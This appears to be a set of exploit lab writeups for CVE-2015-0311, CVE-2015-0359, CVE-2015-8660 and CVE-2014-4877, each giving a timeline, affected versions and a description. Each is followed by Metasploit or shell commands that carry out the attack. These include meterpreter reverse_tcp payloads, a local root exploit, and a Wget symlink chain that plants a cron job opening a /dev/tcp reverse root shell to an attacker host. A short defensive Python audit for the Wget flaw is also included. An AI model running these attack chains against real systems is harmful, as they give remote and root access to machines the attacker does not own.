CVE-2015-0311 Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free

Timeline :

Vulnerability discovered exploited in the wild on 2015-01-21
Patched by the vendor on 2015-01-22
Metasploit PoC provided on 2015-03-09

PoC provided by :

Unknown
hdarwin
juan vazquez

Reference(s) :

CVE-2015-0311
APSA15-01

Affected version(s) :

Adobe Flash Player 16.0.0.287 and earlier versions for Windows and Macintosh
Adobe Flash Player 13.0.0.262 and earlier 13.x versions
Adobe Flash Player 11.2.202.438 and earlier versions for Linux

Tested on :

Windows 7 SP1 and Internet Explorer 8 with Adobe Flash Player 16.0.0.287

Description :

This module exploits a use after free vulnerability in Adobe Flash Player. The vulnerability occurs in the ByteArray::UncompressViaZlibVariant method, when trying to uncompress() a malformed byte stream. This module has been tested successfully on:
* Windows 7 SP1 (32 bits), IE 8 to IE 11 and Flash 16.0.0.287, 16.0.0.257 and 16.0.0.235.
* Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 16.0.0.287.
* Windows 8.1, Firefox 38.0.5 and Adobe Flash 16.0.0.305.
* Linux Mint “Rebecca” (32 bits), Firefox 33.0 and Flash 11.2.202.424.

Commands :

use exploit/multi/browser/adobe_flash_uncompress_zlib_uaf
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
run

getuid

CVE-2015-0359 Adobe Flash Player domainMemory ByteArray Use After Free

Timeline :

Vulnerability discovered by bilou and reported to Chromium VRP
Patched by the vendor on 2015-04-14
Vulnerability integrated into exploit kit on 2015-04-17
PoC provided by unknown and hdarwin on 2015-05-02
Metasploit PoC provided on 2015-05-08

PoC provided by :

bilou
Unknown
hdarwin
juan vazquez

Reference(s) :

CVE-2015-0359
APSB15-06

Affected version(s) :

Adobe Flash Player 17.0.0.134 and earlier versions

Tested on :

Windows 7 SP1 and Internet Explorer 8 with Adobe Flash 17.0.0.134

Description :

This module exploits a use-after-free vulnerability in Adobe Flash Player. The vulnerability occurs when the ByteArray assigned to the current ApplicationDomain is freed from an ActionScript worker by forcing a reallocation, that is, by copying more contents than the original capacity. Flash forgets to update the domainMemory pointer, which leads to a use-after-free when the main worker references the domainMemory again. This module has been tested successfully on Windows 7 SP1 (32-bit), IE 8 and IE 11 with Flash 17.0.0.134.

Commands :

use exploit/windows/browser/adobe_flash_domain_memory_uaf
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
run

getuid

CVE-2015-8660 Linux Kernel OverLay Fail

Timeline :

Vulnerability discovered by Nathan Williams and reported to vendor
Patched by the vendor on 2015-12-04
Advisory released on 2015-12-28
PoC provided by rebel on 2015-01-06

PoC provided by :

rebel

Reference(s) :

CVE-2015-8660

Affected version(s) :

Linux kernel through 4.3.3

Tested on :

Ubuntu Server 64-bit 15.10 with python installed

Description :

The ovl_setattr function in fs/overlayfs/inode.c in the Linux kernel through 4.3.3 attempts to merge distinct setattr operations, which allows local users to bypass intended access restrictions and modify the attributes of arbitrary overlay files via a crafted application.

Commands :

gcc -o CVE-2015-8660 CVE-2015-8660.c
id
./CVE-2015-8660
id

CVE-2014-4877 GNU Wget FTP Symlink Arbitrary Filesystem Access

Timeline :

Vulnerability discovered by hdm on 2014-08-24
Vulnerability notified to vendor on 2014-08-24
Patched by the vendor on 2014-09-01
Advisory released on 2014-10-27
Metasploit PoC provided on 2014-10-27

PoC provided by :

HD Moore of Rapid7

Reference(s) :

CVE-2014-4877

Affected version(s) :

All GNU Wget before version 1.16

Tested on :

Ubuntu Server 12.10 with GNU Wget version 1.13.4 and root user

Description :

This module exploits a vulnerability in Wget when used in recursive (-r) mode with an FTP server as a destination. A symlink is used to allow arbitrary writes to the target’s filesystem. To specify content for the file, use the “file:/path” syntax for the TARGET_DATA option. Tested successfully with wget 1.14. Versions prior to 1.16 are presumed vulnerable.
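
For hosts that run recursive FTP mirrors, the following audit is an added example, not part of the original post or of the Metasploit module. It flags Wget builds older than 1.16 from the `wget --version` banner and lists symlinks in a mirrored tree that resolve outside it; the function names and the sample tree are constructed for illustration.

```python
import os
import re
import tempfile

FIXED = (1, 16)  # per the page: all GNU Wget before 1.16 are affected


def wget_is_affected(version_banner):
    """Parse the first line of `wget --version` and compare it with 1.16."""
    m = re.search(r"GNU Wget (\d+)\.(\d+)", version_banner)
    if not m:
        raise ValueError("not a GNU Wget version banner")
    return (int(m.group(1)), int(m.group(2))) < FIXED


def escaping_symlinks(mirror_root):
    """Return (link, resolved target) for symlinks that leave mirror_root."""
    root = os.path.realpath(mirror_root)
    hits = []
    # followlinks=False: the audit itself never descends through a link.
    for dirpath, dirnames, filenames in os.walk(root, followlinks=False):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            if not os.path.islink(path):
                continue
            target = os.path.realpath(path)
            if os.path.commonpath([root, target]) != root:
                hits.append((os.path.relpath(path, root), target))
    return sorted(hits)


def demo():
    """Constructed mirror tree: one link stays inside, one points outside."""
    with tempfile.TemporaryDirectory() as base:
        mirror = os.path.join(base, "mirror")
        os.makedirs(os.path.join(mirror, "pub"))
        os.symlink("pub", os.path.join(mirror, "latest"))  # stays inside
        os.symlink(os.path.dirname(base), os.path.join(mirror, "x"))  # escapes
        return [link for link, _ in escaping_symlinks(mirror)]


if __name__ == "__main__":
    print(wget_is_affected("GNU Wget 1.13.4 built on linux-gnu."))
    print(demo())
```

Any hit from escaping_symlinks on a directory populated by an affected Wget means files under that link name may have been written outside the mirror root.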

Commands :

1. Create a reverse bash payload

msfvenom -p cmd/unix/reverse_bash -f raw LHOST=192.168.6.138

2. Create a crontab file that runs once a minute and launches the command below

cat>cronshell <<EOD
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
* * * * * root bash -c '0<&148-;exec 148<>/dev/tcp/192.168.6.138/4444;sh <&148 >&148 2>&148'; rm -f /etc/cron.d/cronshell
EOD

3. Run a shell listener in Metasploit

use exploit/multi/handler
set PAYLOAD cmd/unix/reverse_bash
set LHOST 192.168.6.138
run -j

4. Run the wget_symlink_file_write Metasploit module

use auxiliary/server/wget_symlink_file_write
set SRVHOST 192.168.6.138
set TARGET_FILE /etc/cron.d/cronshell
set TARGET_DATA file:/root/cronshell
set SRVPORT 21
run

5. On the victim machine, execute the command below

wget -m ftp://192.168.6.138:21/

6. Get the Metasploit session

sessions -i 1

id
uname -a